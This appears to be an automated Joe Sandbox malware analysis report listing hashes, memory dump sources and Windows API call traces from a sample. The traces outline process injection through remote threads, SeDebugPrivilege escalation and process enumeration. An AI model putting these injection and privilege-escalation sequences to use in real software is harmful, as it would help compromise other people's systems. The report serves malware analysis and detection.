                                                                  • Opcode ID: 2a9d7a6043b61eb5a444d87ebce2f5865ace6771c7c66fe5ec91156bfd5689eb
                                                                  • Instruction ID: dfcb897c3c3ddb5f64d256e8bd4ce8caa9f1c39f7f70016a84696abcb0595acb
                                                                  • Opcode Fuzzy Hash: 2a9d7a6043b61eb5a444d87ebce2f5865ace6771c7c66fe5ec91156bfd5689eb
                                                                  • Instruction Fuzzy Hash: EA12BE2010D7C18DE322C678945479FFFD11BA7618F484A9EE1E85B393D6BA8109CB77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $ $%$&$*$0$1$6$6$;$<$<$A$Ax`B$B$E$G$H$I$K$L$N$O$R$S$X$[$`$a$c$c$d$d$d$d$l$l$m$m$o$o$o$o$o$p$r$r$r$r$s$x$x$y$y${O
                                                                  • API String ID: 0-2256030295
                                                                  • Opcode ID: da0bcaadc6d3e6a73930e08e3bb51312d0306c4b7cb00b51c7135d2fd64d93b4
                                                                  • Instruction ID: 43956b3c6462715040061548aa2c3e0b9dcfe60922f62804308211c4145eee04
                                                                  • Opcode Fuzzy Hash: da0bcaadc6d3e6a73930e08e3bb51312d0306c4b7cb00b51c7135d2fd64d93b4
                                                                  • Instruction Fuzzy Hash: C312C02010D7C18DD362867C949878FFFD11BE7228F585A9DF1E84A3E3C2AA8149C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$-$1$7$C$G$H$L$P$^$a$a$a$b$c$c$d$d$d$d$d$d$e$e$e$e$e$f$f$g$g$i$i$i$l$l$m$m$o$o$p$p$r$s$s$t$t$t$t$x$x$y$|$}
                                                                  • API String ID: 0-2094285404
                                                                  • Opcode ID: 51d36cf9d135ff13def567e27bab96c356f22eb539a5bbfb782b486a00b3a5bc
                                                                  • Instruction ID: f91fdec992fe17677b43e0b7d472141b995edb7bc8f57b37002556bdc30744f2
                                                                  • Opcode Fuzzy Hash: 51d36cf9d135ff13def567e27bab96c356f22eb539a5bbfb782b486a00b3a5bc
                                                                  • Instruction Fuzzy Hash: 4822022110D7C18DE3328B38945479BBFD21FE7218F185E9EE5E84B3A2C6B58109DB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $ $%$&$*$0$1$6$6$;$<$<$A$Ax`B$B$E$G$K$L$N$O$R$S$X$[$`$a$c$c$d$d$d$d$l$l$m$m$o$o$o$o$o$p$r$r$r$r$s$x$x$y$y${O
                                                                  • API String ID: 0-2712818868
                                                                  • Opcode ID: 6ffe89f5952b37d7b41ad2369ec969154af03488458b80ea56ad85364e586578
                                                                  • Instruction ID: 1d3985015a6004c57cc64fd4eab342ec2e216b16199d8406fbd0a1e5bf867d26
                                                                  • Opcode Fuzzy Hash: 6ffe89f5952b37d7b41ad2369ec969154af03488458b80ea56ad85364e586578
                                                                  • Instruction Fuzzy Hash: 1602B02010D7C18DD362867D949878FFFD11BE7228F585A9DE1E84B3E3C2AA8149C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$)$+er$.$.$.$.$0$1$1$2$4$6$8$;$@$H$N'$P$Y$Z$]$^$a$a$a$a$b$c$c$c$e$e$f$g$h$i$i$l$m$m$m$m$n$r$r$w$w$x$y$y$y$|
                                                                  • API String ID: 0-4186895133
                                                                  • Opcode ID: 0457d87cb6172381257f14a505d1067714eb00389eaa25dabdda14dbf2249052
                                                                  • Instruction ID: d9655f3602fa6a1bb02df14978dde1affe4b5e2ecf171b0ab4337b2ceb98d59a
                                                                  • Opcode Fuzzy Hash: 0457d87cb6172381257f14a505d1067714eb00389eaa25dabdda14dbf2249052
                                                                  • Instruction Fuzzy Hash: B032D02110E7C18DD322973C945879FFFE11BA7218F585E9DE1E88B393C2A68149C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3$<$C$I$S$a$a$a$a$a$a$a$a$b$c$d$d$d$dualc$e$e$fna$g$h$hyb$i$l$l$lmada$m$n$n$n$n$n$n$o$o$r$r$r$r$rebyc$s$s$s$t$t$y
                                                                  • API String ID: 0-907914069
                                                                  • Opcode ID: 0332521eceea5fd94bb27fe7acd8e7d51adc7a05d74f19a4687ecc626ac915ed
                                                                  • Instruction ID: 78c049e7797477cb6e619203f3ba55b69d2c157b8d549aaa0d27a5a6a91e7049
                                                                  • Opcode Fuzzy Hash: 0332521eceea5fd94bb27fe7acd8e7d51adc7a05d74f19a4687ecc626ac915ed
                                                                  • Instruction Fuzzy Hash: 6812BF3440D3C18EE332CB2994547DFBFE16BA6308F088DAED4DD5A292D6B60159CB67
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?,?,?,0000005D), ref: 0040BE46
                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0040BE66
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Time$InformationLocalZone
                                                                  • String ID: "$'$($($)$+$1$2$2$4$?$E$G$G$H$K$M$U$W$Z$^$e$g$h$h$i$m$n$p$z
                                                                  • API String ID: 93009163-702723632
                                                                  • Opcode ID: d4280e2c651efcdaf4adcd37bac95a97bed8fc85061677ef0d98c041c8610d7f
                                                                  • Instruction ID: f24f2204c30bf8112847402748224eab2bce5a1f2b66652d7b583283150f38f1
                                                                  • Opcode Fuzzy Hash: d4280e2c651efcdaf4adcd37bac95a97bed8fc85061677ef0d98c041c8610d7f
                                                                  • Instruction Fuzzy Hash: DEC1382110D7C189D322C77C948469FFFD15BEB228F584A9DF1E48B3E2C2658549C76B
                                                                  APIs
                                                                  • QueryDosDeviceA.KERNEL32(000000A1,?,00000200), ref: 00423E6D
                                                                  • GetLastError.KERNEL32 ref: 00423E83
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00423E99
                                                                  • lstrcatA.KERNEL32(?,000000A1), ref: 00423EA5
                                                                  • DefineDosDeviceA.KERNEL32(00000001,000000A1,?), ref: 00423EB3
                                                                  • GetLastError.KERNEL32 ref: 00423EC1
                                                                  • lstrcpyA.KERNEL32(?,000000EC), ref: 00423EE0
                                                                  • lstrcatA.KERNEL32(?,000000A1), ref: 00423EF3
                                                                  • CreateFileA.KERNEL32(?,00000000,00000001,00000000,00000003,00000000,000000FF), ref: 00423F0D
                                                                  • DeviceIoControl.KERNEL32(00000000,00170002,00000092,00000004,00000099,000000DC,000000EC,00000000), ref: 00423F2E
                                                                  • GetLastError.KERNEL32 ref: 00423F38
                                                                  • DefineDosDeviceA.KERNEL32(00000007,000000A1,?), ref: 00423F70
                                                                  • GetLastError.KERNEL32 ref: 00423F7A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: DeviceErrorLast$Definelstrcatlstrcpy$ControlCreateFileQuery
                                                                  • String ID: !$-$T$e$f$z$}
                                                                  • API String ID: 204970884-3644634782
                                                                  • Opcode ID: 56c54b7da3f6591e38d1c0b40ab5c6b6fc7a851bac03c90d99fe65f73b77bc95
                                                                  • Instruction ID: beacce81ebdc5a62315d6854d61fdc252875682725b92811e62445d41cf4b898
                                                                  • Opcode Fuzzy Hash: 56c54b7da3f6591e38d1c0b40ab5c6b6fc7a851bac03c90d99fe65f73b77bc95
                                                                  • Instruction Fuzzy Hash: BD61B830A042DDAEDF21CFB99C48ADE7FB49F16320F444295E5A4A62D1C3744706CB69
                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(?,?,?,?,?,74DF3310,00000063), ref: 004063AB
                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,74DF3310,00000063), ref: 004063C4
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,74DF3310,00000063), ref: 004063D3
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,74DF3310,00000063), ref: 004063DF
                                                                  • lstrcmpA.KERNEL32(?,0042E310), ref: 0040640E
                                                                  • lstrcmpA.KERNEL32(?,0042E30C), ref: 0040641E
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00406440
                                                                  • lstrcatA.KERNEL32(?,?), ref: 00406453
                                                                  • lstrcatA.KERNEL32(?,0042E308), ref: 00406462
                                                                  • lstrcpyA.KERNEL32(?,?,00000063), ref: 004064BB
                                                                  • lstrcatA.KERNEL32(?,?), ref: 004064CE
                                                                  • FindNextFileA.KERNEL32(?,?,00000063), ref: 0040653F
                                                                  • FindClose.KERNEL32(?), ref: 0040655C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: lstrcat$Findlstrcpy$Filelstrcmp$CloseErrorFirstLastNext
                                                                  • String ID: :\$.$.$a$b$w
                                                                  • API String ID: 1838452084-3178132420
                                                                  • Opcode ID: 26a3c23a68273bf8c967d5a4a1b22617189afc168d45bd22dd0b1123420d9e14
                                                                  • Instruction ID: d91f1d41485bd9133756b8c6267c5f734ad3426634637d29d8fe53ea42b8f97d
                                                                  • Opcode Fuzzy Hash: 26a3c23a68273bf8c967d5a4a1b22617189afc168d45bd22dd0b1123420d9e14
                                                                  • Instruction Fuzzy Hash: CF51F772108384ABC720DB65DC44BDFB7E9AFC8304F40492EF58A97281D779D609CB6A
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00401911
                                                                  • GetLocalTime.KERNEL32(0000005E), ref: 0040191C
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00401936
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040193D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CloseCreateEnvironmentExpandFileHandleLocalStringsTime
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
                                                                  • API String ID: 2910088009-759814561
                                                                  • Opcode ID: a79a7929436da7264a15b6a66c219a1273af2adf041c396046486cd8ebe7c2c0
                                                                  • Instruction ID: 9d7d35d6ed35067f5301624282322d6ee0cd526578bc1b9978354d1e4a90c02c
                                                                  • Opcode Fuzzy Hash: a79a7929436da7264a15b6a66c219a1273af2adf041c396046486cd8ebe7c2c0
                                                                  • Instruction Fuzzy Hash: E631EC2110C3C1D9E312DB38984874FBFD15BA7618F488A9DF1E95A2D2C2B99249C7A7
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(0000042A,00000000,?,?,00000000,000000DD,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?), ref: 0040487B
                                                                  • lstrlenA.KERNEL32(BR@,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 0040489A
                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000001,00001000,00000004,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048B7
                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,BR@,00000001,00000000,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048D3
                                                                  • GetModuleHandleA.KERNEL32(Kernel32,LoadLibraryA,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 004048EB
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004048F2
                                                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040491E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Process$AddressAllocCreateHandleMemoryModuleOpenProcRemoteThreadVirtualWritelstrlen
                                                                  • String ID: ($BR@$Kernel32$LoadLibraryA
                                                                  • API String ID: 3328640463-1592096681
                                                                  • Opcode ID: 1048440a6fa2ba31e54d9434ac68688d651942ad3db7224efd2e259a51c0311f
                                                                  • Instruction ID: b8c2f0deb781411a5cbda0f33fd6846fbbcdfb44d071191cfa48344f537f40e7
                                                                  • Opcode Fuzzy Hash: 1048440a6fa2ba31e54d9434ac68688d651942ad3db7224efd2e259a51c0311f
                                                                  • Instruction Fuzzy Hash: A831B3B0A40394EFEB208BA98C48B9FBFB9AB96714F14016AF550B62C1C7B44501C7B8
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004050BF
                                                                  • lstrcatA.KERNEL32(?,0042E308), ref: 0040516B
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040517A
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00405184
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004051B7
                                                                  • Process32First.KERNEL32 ref: 004051E9
                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00405259
                                                                    • Part of subcall function 00404840: OpenProcess.KERNEL32(0000042A,00000000,?,?,00000000,000000DD,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?), ref: 0040487B
                                                                    • Part of subcall function 00404840: lstrlenA.KERNEL32(BR@,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 0040489A
                                                                    • Part of subcall function 00404840: VirtualAllocEx.KERNEL32(00000000,00000000,00000001,00001000,00000004,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048B7
                                                                    • Part of subcall function 00404840: WriteProcessMemory.KERNEL32(00000000,00000000,BR@,00000001,00000000,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048D3
                                                                    • Part of subcall function 00404840: GetModuleHandleA.KERNEL32(Kernel32,LoadLibraryA,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 004048EB
                                                                    • Part of subcall function 00404840: GetProcAddress.KERNEL32(00000000), ref: 004048F2
                                                                    • Part of subcall function 00404840: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040491E
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CreateHandleProcessProcess32lstrcat$AddressAllocAttributesCloseDirectoryFileFirstMemoryModuleNextOpenProcRemoteSnapshotSystemThreadToolhelp32VirtualWritelstrlen
                                                                  • String ID: T$o
                                                                  • API String ID: 347023813-3088171537
                                                                  • Opcode ID: 1637164c7f9895b18762df92123e5e50300fe974904146b62b15fd1e0cf0ceda
                                                                  • Instruction ID: feaa7f443b79ad3512fc15c49273def89914fdb135639313c3836c96608cb255
                                                                  • Opcode Fuzzy Hash: 1637164c7f9895b18762df92123e5e50300fe974904146b62b15fd1e0cf0ceda
                                                                  • Instruction Fuzzy Hash: 7C51F03510C3D18AD310DB39AC84BDFBFD48BD6324F485A6DE5E8862D2D6788509CB67
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,00000000), ref: 0041E0FB
                                                                  • LoadResource.KERNEL32(?,00000000,?), ref: 0041E110
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Resource$FindLoad
                                                                  • String ID: J$j
                                                                  • API String ID: 2619053042-3737368804
                                                                  • Opcode ID: 59f09915b7c398c90ca5aa23a131cfd19cb12457168d76c6417c5eaae1914163
                                                                  • Instruction ID: fac2f0c8f6ecf36566f1a5ae47c595f35cc5e359fa8f75e74032fb34fa1c9e17
                                                                  • Opcode Fuzzy Hash: 59f09915b7c398c90ca5aa23a131cfd19cb12457168d76c6417c5eaae1914163
                                                                  • Instruction Fuzzy Hash: 4541293A2087815BD3118B29AC85BD73B94D79A370F145139E9A1873F1D778484BC76E
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(74DE8A60,?,?,?,?,?,?,004051B3), ref: 004047AA
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,004051B3), ref: 004047B3
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,004051B3), ref: 004047B6
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004047CD
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00404810
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,004051B3), ref: 0040482C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Process$CurrentToken$AdjustCloseHandleLookupOpenPrivilegePrivilegesValue
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 3621747604-2896544425
                                                                  • Opcode ID: 0b374022394a715b8987bc5ef204c25a5dec9ab52c03f500be3cd1fab7d0c95c
                                                                  • Instruction ID: 052f3df82ca70502255671040b2a31584c8238dd5ceadda2b5f1d62a07713268
                                                                  • Opcode Fuzzy Hash: 0b374022394a715b8987bc5ef204c25a5dec9ab52c03f500be3cd1fab7d0c95c
                                                                  • Instruction Fuzzy Hash: ED01C475608340AFE310DF65DC49B9B7BE4BB88700F40682CF28497291C7B49505CB6A
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,00000001), ref: 0040418C
                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 0040426D
                                                                  • ReleaseMutex.KERNEL32(?), ref: 004042A5
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404498
                                                                  • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,000000FF), ref: 004044F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: MutexRelease$ObjectSingleWait
                                                                  • String ID:
                                                                  • API String ID: 257779224-0
                                                                  • Opcode ID: 8f655228cdc90f06d313c78c90473a3e5cbcebb0cb1dc3bdbce8e6e6bec819a1
                                                                  • Instruction ID: 8c9ce78122583aa8a55ee52179d80f89be94f9b8b227595c5774061f7ec44eb9
                                                                  • Opcode Fuzzy Hash: 8f655228cdc90f06d313c78c90473a3e5cbcebb0cb1dc3bdbce8e6e6bec819a1
                                                                  • Instruction Fuzzy Hash: 50C190751083809FD320CF29D885B9BBBE4AFD9304F10492EF599873A2CB78A509CB56
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 00429F5E
• GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00429F6F
• VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00429FB5
• VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00429FF3
• VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0042A019
Memory Dump Source
• Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_document.jbxd
Similarity
• API ID: Virtual$Query$AllocInfoProtectSystem
• String ID:
• API String ID: 4136887677-0
• Opcode ID: c67923648d0627a3e019e3e4bfa5385d88bc288047f0f5f504da8e189111f8be
• Instruction ID: eda20bf0d75a8237f75d833b080248ab74fea35a03fb107c59d71fc75ff335a4
• Opcode Fuzzy Hash: c67923648d0627a3e019e3e4bfa5385d88bc288047f0f5f504da8e189111f8be
